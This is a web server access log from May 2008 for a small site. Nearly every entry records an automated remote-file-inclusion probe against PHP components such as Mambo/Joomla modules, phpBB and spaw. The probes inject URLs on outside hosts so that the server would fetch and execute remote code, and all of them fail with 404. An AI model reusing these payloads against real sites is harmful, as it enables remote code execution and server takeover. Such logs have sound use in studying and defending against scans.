88.84.144.62 - - [11/May/2008:17:00:06 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:00:06 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:00:07 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:00:07 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:00:07 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.97.132.117 - - [11/May/2008:17:00:13 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:01:05 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:01:05 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:01:05 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
212.97.132.117 - - [11/May/2008:17:01:21 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:01:47 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:01:48 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:01:48 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:01:49 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:12 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:12 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:13 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:14 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:14 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:14 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:14 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:15 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:15 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:23 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:24 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:24 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:02:24 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:04:07 -0700] "GET /logs/access_080414.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:17:05:06 -0700] "GET /logs/access_080225.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:17:05:06 -0700] "GET ///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:17:05:06 -0700] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
87.106.51.184 - - [11/May/2008:17:07:33 -0700] "GET /logs/access_080128.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
83.19.144.26 - - [11/May/2008:17:08:40 -0700] "GET /logs/access.log/errors.php?error=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
74.6.18.215 - - [11/May/2008:17:11:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.20.32 - - [11/May/2008:17:11:29 -0700] "GET /logs/access.log HTTP/1.0" 200 8281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:12:18 -0700] "GET /logs/access_080128.log//newspublish/include.php?path%5Bdocroot%5D=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:12:18 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:12:18 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:12:47 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:17:13:13 -0700] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:17:13:13 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:17:13:13 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.116.117.149 - - [11/May/2008:17:14:08 -0700] "GET /logs/access_080127.log//oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
62.116.117.149 - - [11/May/2008:17:14:08 -0700] "GET /logs/access_080127.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
62.116.117.149 - - [11/May/2008:17:14:09 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
62.116.117.149 - - [11/May/2008:17:14:09 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
62.116.117.149 - - [11/May/2008:17:14:09 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
62.116.117.149 - - [11/May/2008:17:14:09 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
211.172.232.90 - - [11/May/2008:17:14:49 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
211.172.232.90 - - [11/May/2008:17:14:50 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
72.232.214.82 - - [11/May/2008:17:15:05 -0700] "GET //appserv/errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
72.232.214.82 - - [11/May/2008:17:15:05 -0700] "GET /logs//appserv/errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
211.233.6.126 - - [11/May/2008:17:15:23 -0700] "GET /logs/access.log/errors.php?error=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
208.99.194.216 - - [11/May/2008:17:15:30 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.toulouseangloexchange.com"
216.7.32.9 - - [11/May/2008:17:16:05 -0700] "GET //index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
216.7.32.9 - - [11/May/2008:17:16:06 -0700] "GET /logs//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.toulouseangloexchange.com"
72.233.79.202 - - [11/May/2008:17:16:34 -0700] "GET /logs/errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
72.233.79.202 - - [11/May/2008:17:16:34 -0700] "GET /errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:17:17:26 -0700] "GET /logs/access_080211.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:17:17:26 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.22.89.194 - - [11/May/2008:17:17:27 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:17:17:31 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.205.67.241 - - [11/May/2008:17:17:31 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.72.112.14 - - [11/May/2008:17:17:57 -0700] "GET /logs/access_080107.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://galego.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
64.72.112.14 - - [11/May/2008:17:17:58 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://galego.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
64.72.112.14 - - [11/May/2008:17:17:58 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://galego.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:18:38 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:18:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:18:39 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:18:51 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:18:51 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:18:51 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:19:17 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:19:18 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:19:18 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.17.138.13 - - [11/May/2008:17:19:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.toulouseangloexchange.com"
85.17.138.13 - - [11/May/2008:17:19:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.toulouseangloexchange.com"
209.62.115.202 - - [11/May/2008:17:20:08 -0700] "GET /logs/access.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:17:20:23 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:17:20:23 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:17:20:23 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.207.204.13 - - [11/May/2008:17:20:25 -0700] "GET /logs/access_080211.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:17:20:35 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:17:20:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:17:20:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:17:21:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
84.19.176.158 - - [11/May/2008:17:21:50 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:22:02 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:22:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:22:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:22:10 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:22:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:22:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:17:22:15 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:17:22:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
145.100.60.18 - - [11/May/2008:17:22:16 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.72.112.14 - - [11/May/2008:17:22:28 -0700] "GET /logs/access_080414.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://galego.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
64.72.112.14 - - [11/May/2008:17:22:53 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://galego.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
62.116.117.149 - - [11/May/2008:17:22:59 -0700] "GET /logs/access_080225.log//oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
62.116.117.149 - - [11/May/2008:17:23:00 -0700] "GET /logs/access_080225.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:23:44 -0700] "GET /logs/access_080414.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:24:28 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:24:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
168.176.162.45 - - [11/May/2008:17:24:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
88.84.144.62 - - [11/May/2008:17:24:32 -0700] "GET /logs/access_080414.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
